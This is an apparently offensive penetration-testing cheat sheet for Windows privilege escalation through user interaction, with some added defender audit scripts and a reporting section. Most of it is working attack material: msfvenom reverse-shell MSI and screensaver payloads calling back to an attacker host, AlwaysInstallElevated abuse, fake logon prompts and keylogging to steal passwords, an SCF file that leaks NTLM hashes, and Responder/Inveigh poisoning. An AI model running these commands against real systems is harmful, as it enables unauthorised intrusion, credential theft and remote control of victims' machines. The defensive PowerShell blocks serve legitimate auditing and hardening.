πŸ›‘οΈ Methodology Checklist

  • Check AlwaysInstallElevated HKCU: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Check AlwaysInstallElevated HKLM: reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Both = 1? Generate MSI payload: msfvenom -p windows/x64/shell_reverse_tcp ... -f msi
  • Install: msiexec /i payload.msi /quiet /qn /norestart
  • Deploy FakeLogonScreen or SharpLoginPrompt to capture user credentials
  • Check screensaver: reg query "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE
  • Run Inveigh for LLMNR/NBT-NS poisoning from Windows host

🎯 Operational Context

Use when: standard privesc paths are exhausted; fall back to user-interaction attacks (keyloggers, window interception, fake prompts) to capture admin credentials. Think dumber first: if an admin is logged in and you have user-level access, Meterpreter keyscan_start captures everything typed, including admin passwords. Screen capture (screenshot) confirms the admin is active. These are passive, with no crash risk. Skip when: no interactive admin session is present on the target; these attacks require a logged-in user to interact with.


⚡ Tactical Cheatsheet

| Command | Tactical Outcome |
| --- | --- |
| .\SharpUp.exe audit | Find AlwaysInstallElevated + other user-interaction vectors |
| reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Check AlwaysInstallElevated for current user |
| reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Check AlwaysInstallElevated system-wide |
| msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f msi -o evil.msi | Generate MSI payload for AlwaysInstallElevated |
| msiexec /i evil.msi /quiet | Install MSI; runs as SYSTEM if AlwaysInstallElevated is enabled |
| C:\Windows\System32\Taskmgr.exe /4 | Launch Task Manager (DLL hijack target) |
| .\Responder.py -I [IFACE] -wv | Capture NTLM hashes from user browsing |
| Invoke-Inveigh | PowerShell LLMNR/NBNS/SMB poisoner for NTLM capture |
| .\FakeLogonScreen.exe | Fake Windows logon screen to capture user password |
| .\SharpLoginPrompt.exe | Displays credential prompt; captured to file/console |
| Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name SCRNSAVE.EXE -Value "C:\evil.exe" | Set malicious screensaver for when user locks screen |

🔬 Deep Dive & Workflow

AlwaysInstallElevated: MSI SYSTEM Escalation

# Check both registry keys: BOTH must be set to 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# → AlwaysInstallElevated    REG_DWORD    0x1

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# → AlwaysInstallElevated    REG_DWORD    0x1

# If both = 1 → MSI packages install as SYSTEM

# Generate payload MSI
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f msi -o evil.msi

# Execute (elevates automatically to SYSTEM)
msiexec /i \\[LHOST]\share\evil.msi /quiet /qn /norestart
# or local:
msiexec /i C:\temp\evil.msi /quiet

PowerUp detection: Invoke-AllChecks catches this and auto-generates a payload under the "AlwaysInstallElevated" finding.
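Defender-side counterpart, added here and not part of the original page: a PowerShell audit that evaluates the "both hives must be 1" condition (an absent value counts as 0), a remediation that writes 0 to both hives, and a look back at MsiInstaller events (IDs 1033 and 11707) to see what was installed. Function names are my own.

```powershell
# Added example, not from the original page: audit and remediate AlwaysInstallElevated.
# The policy is live only when BOTH hives hold 1; an absent value behaves like 0.
$InstallerPolicyKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

function Get-AlwaysInstallElevatedStatus {
    $values = @{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $item = Get-ItemProperty -Path "${hive}:\$InstallerPolicyKey" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $values[$hive] = if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKLM        = $values['HKLM']
        HKCU        = $values['HKCU']
        Exploitable = ($values['HKLM'] -eq 1 -and $values['HKCU'] -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Writes 0 to both hives (HKLM needs local admin). On GPO-managed hosts fix the
    # policy "Always install with elevated privileges" instead, or the next GPO refresh re-enables it.
    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\$InstallerPolicyKey"
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

function Get-RecentMsiInstalls {
    param([int]$Hours = 24)
    # MsiInstaller 1033 (product installed, with status) and 11707 (install completed) show what
    # was installed; an MSI from a temp directory or UNC share, run by a standard user, is the signal.
    Get-WinEvent -FilterHashtable @{
        LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033, 11707
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, UserId, Message
}

$status = Get-AlwaysInstallElevatedStatus
$status
if ($status.Exploitable) {
    Write-Warning 'AlwaysInstallElevated set in both hives: any user can install an MSI as SYSTEM'
    Get-RecentMsiInstalls | Format-Table -AutoSize
}
```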

Fake Logon Screen: Physical/RDP User Capture

# Deploy FakeLogonScreen (blocks real desktop)
# Requires interactive session (not just shell)
.\FakeLogonScreen.exe
# → Displays pixel-perfect Windows login screen
# → Captures typed password → saves to file or displays in terminal
# → Dismiss: type anything and it falls through

# Or SharpLoginPrompt (pops credential dialog)
.\SharpLoginPrompt.exe
# → Standard Windows auth dialog (looks legitimate)
# → Returns typed credentials to console

When to use: During physical access, RDP session, or if you have GUI access and target user is expected to authenticate shortly.

NTLM Hash Capture via Responder (Local)

# If you can place a file that triggers UNC path access:
# Create malicious file (e.g., in shared dir, desktop, email attachment)
# → user opens folder → Windows tries UNC path → sends NTLM to attacker

# Embed UNC trigger in .scf file (written from a bash shell; single quotes keep the backslashes literal):
echo '[Shell]' > @evil.scf
echo 'Command=2' >> @evil.scf
echo 'IconFile=\\[LHOST]\share\icon.ico' >> @evil.scf
echo '[Taskbar]' >> @evil.scf
echo 'Command=ToggleDesktop' >> @evil.scf
# The IconFile line is what makes this effective: the icon path points to the attacker
# → File Explorer auto-requests the UNC path to draw the icon, without the user opening the file

# Attacker captures with Responder:
sudo ./Responder.py -I [IFACE] -wv
# Crack captured NTLMv2: hashcat -a 0 -m 5600 hash.txt rockyou.txt
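Hunting counterpart, added here and not part of the original page: a PowerShell function that walks a share or profile directory for .scf/.url files whose IconFile, URL or WorkingDirectory value is a UNC path, and reports which server a victim's SMB client would authenticate to. The sample file and the server name fileserver.example are constructed for the demonstration; the function name is my own.

```powershell
# Added example, not from the original page: find SCF/URL files carrying a UNC trigger.
function Find-UncIconTrigger {
    param([Parameter(Mandatory)][string[]]$Path)
    # INI-style values that make Explorer fetch a remote resource when the folder is merely viewed
    $pattern = '^\s*(IconFile|URL|WorkingDirectory)\s*=\s*(\\\\[^\\\s]+\\\S*)'
    foreach ($file in Get-ChildItem -Path $Path -Recurse -File -Include *.scf, *.url -ErrorAction SilentlyContinue) {
        # SCF/URL files are tiny text files; anything large is not a trigger worth parsing here
        if ($file.Length -gt 16KB) { continue }
        foreach ($line in Get-Content -LiteralPath $file.FullName -ErrorAction SilentlyContinue) {
            if ($line -match $pattern) {
                $target = $Matches[2]
                [pscustomobject]@{
                    File     = $file.FullName
                    Key      = $Matches[1]
                    Target   = $target
                    Server   = ($target -split '\\')[2]   # host the victim's SMB client will authenticate to
                    Owner    = (Get-Acl -LiteralPath $file.FullName).Owner
                    Modified = $file.LastWriteTime
                }
            }
        }
    }
}

# Constructed sample: a benign SCF with an example UNC icon path in a temp folder
$sample = Join-Path $env:TEMP 'scf-hunt-demo'
New-Item -ItemType Directory -Path $sample -Force | Out-Null
@('[Shell]', 'Command=2', 'IconFile=\\fileserver.example\share\icon.ico', '[Taskbar]', 'Command=ToggleDesktop') |
    Set-Content -Path (Join-Path $sample '@demo.scf')
Find-UncIconTrigger -Path $sample | Format-Table -AutoSize
# Follow-up: compare Server against the approved file servers; anything else (or a bare IP)
# is a capture host, and outbound SMB/445 towards it belongs on the egress block list.
```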

Malicious Screensaver

# If you have user-level access and can wait for them to lock:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f exe -o evil.exe
copy evil.exe C:\Windows\Temp\evil.scr
 
# Set as screensaver
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name SCRNSAVE.EXE -Value "C:\Windows\Temp\evil.scr"
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name ScreenSaveActive -Value "1"
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name ScreenSaverIsSecure -Value "0"
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name ScreenSaveTimeout -Value "60"
 
# → After 60 seconds of inactivity → shell executes as current user
# → If current user has admin token → SYSTEM payloads viable after UAC bypass
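Audit counterpart, added here and not part of the original page: a PowerShell check that reads SCRNSAVE.EXE, ScreenSaverIsSecure and ScreenSaveTimeout from every loaded user hive under HKEY_USERS and flags exactly the configuration shown above (binary outside System32, not Authenticode-signed, lock without password). The function name is my own.

```powershell
# Added example, not from the original page: audit screensaver settings for every loaded user hive.
function Get-ScreenSaverAudit {
    $system32 = [Environment]::GetFolderPath('System')     # normally C:\Windows\System32
    # HKEY_USERS only exposes hives of logged-on (or explicitly loaded) users
    foreach ($hive in Get-ChildItem -Path Registry::HKEY_USERS -ErrorAction SilentlyContinue) {
        if ($hive.PSChildName -notmatch '^S-1-5-21-' -or $hive.PSChildName -like '*_Classes') { continue }
        $desktop = Get-ItemProperty -Path "Registry::$($hive.Name)\Control Panel\Desktop" -ErrorAction SilentlyContinue
        $scr = [string]$desktop.'SCRNSAVE.EXE'
        if ([string]::IsNullOrWhiteSpace($scr)) { continue }     # no screensaver configured
        $exe = [Environment]::ExpandEnvironmentVariables($scr.Trim('"'))
        $inSystem32 = $exe.StartsWith($system32, [StringComparison]::OrdinalIgnoreCase)
        $sig = if (Test-Path -LiteralPath $exe) { (Get-AuthenticodeSignature -FilePath $exe).Status.ToString() } else { 'FileMissing' }
        $secure = ([string]$desktop.ScreenSaverIsSecure -eq '1')
        [pscustomobject]@{
            Sid         = $hive.PSChildName
            ScreenSaver = $exe
            InSystem32  = $inSystem32
            Signature   = $sig
            SecureLock  = $secure
            TimeoutSec  = $desktop.ScreenSaveTimeout
            Suspicious  = (-not $inSystem32) -or ($sig -ne 'Valid') -or (-not $secure)
        }
    }
}

Get-ScreenSaverAudit | Format-Table -AutoSize
# Hosts without a logged-on user: load NTUSER.DAT with reg load, or pin the screensaver by GPO
# ("Force specific screen saver" under Control Panel > Personalization) so HKCU edits stop mattering.
```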

Traffic Capture with Inveigh (PowerShell)

# Inveigh = PowerShell Responder equivalent
Import-Module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -LLMNR Y -FileOutput Y
 
# After capture, view results:
Get-InveighLog
Get-InveighNTLMv2   # NTLMv2 hashes
 
# Stop:
Stop-Inveigh
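Mitigation counterpart, added here and not part of the original page: a PowerShell check of whether the host still answers the name requests that Inveigh and Responder poison (LLMNR via the DNSClient EnableMulticast policy, NBT-NS via TcpipNetbiosOptions on each IP-enabled adapter), with the local equivalent of the GPO fix. Function names are my own.

```powershell
# Added example, not from the original page: expose and remove LLMNR/NBT-NS poisoning surface.
function Get-NamePoisoningExposure {
    $dnsPolicy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' -Name EnableMulticast -ErrorAction SilentlyContinue
    # EnableMulticast absent or 1 => LLMNR on (Windows default); 0 => disabled by policy
    $llmnr = if ($null -eq $dnsPolicy) { $true } else { [int]$dnsPolicy.EnableMulticast -ne 0 }
    # TcpipNetbiosOptions: 0 = use DHCP setting (usually on), 1 = enabled, 2 = disabled
    $nics = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
    foreach ($nic in $nics) {
        [pscustomobject]@{
            Adapter    = $nic.Description
            LlmnrOn    = $llmnr
            NetbiosOpt = $nic.TcpipNetbiosOptions
            NetbiosOn  = ($nic.TcpipNetbiosOptions -ne 2)
        }
    }
}

function Disable-NamePoisoningTargets {
    # Local equivalents of the GPO settings; requires admin. Test first: legacy apps may rely on NetBIOS.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableMulticast -Value 0 -Type DWord
    Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        ForEach-Object { Invoke-CimMethod -InputObject $_ -MethodName SetTcpipNetbios -Arguments @{ TcpipNetbiosOptions = 2 } } |
        Select-Object ReturnValue     # 0 = success
}

Get-NamePoisoningExposure | Format-Table -AutoSize
```

Disabling these only removes the poisoning responses; captured NTLMv2 relaying is separately addressed by enforcing SMB signing.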

Resource-Based Constrained Delegation (via User Interaction)

# If you have GenericWrite on a computer object:
# β†’ Set msDS-AllowedToActOnBehalfOfOtherIdentity
# β†’ Impersonate any user to that machine
# β†’ See AD_Bleeding_Edge for RBCD details

πŸ› οΈ Troubleshooting & Edge Cases

| Problem | Cause | Fix |
| --- | --- | --- |
| Meterpreter keyscan needs migration | Low-privilege process | Migrate to a user-context process first: migrate [EXPLORER_PID] or a desktop process |
| Fake prompt PowerShell blocked | AMSI or execution policy | Use a pre-built binary for the credential prompt; or run Invoke-CredentialPhish from memory |
| Screenshot returns black screen | Process not in desktop session | Migrate to a session 1 process (interactive desktop); run ps and find Session=1 processes |
| Keylogger missing keystrokes | Not in correct session | Verify session: Meterpreter getpid; migrate to a PID running in the user session |
| User not responding to fake prompt | Prompt not visible | Use shell + msg * "Please verify your credentials to continue" to alert the user to check the screen |

πŸ“ Reporting Trigger

Finding Title: Credential Capture via Active User Session Keylogging

Impact: Keylogging of an active administrator session captures plaintext credentials for privileged accounts as they are typed, without any cryptographic bypass or exploitation, providing admin credentials through passive monitoring of legitimate user activity.

Root Cause: A low-privileged process can migrate into or monitor a privileged user's desktop session. No behavioral monitoring of process injection into explorer.exe or keyboard hook installation.

Recommendation: Implement Privileged Access Workstations (PAWs) where admin sessions are physically separated from regular user sessions. Deploy EDR to detect keyboard hook installation and session monitoring behaviors. Implement session isolation between user and admin contexts.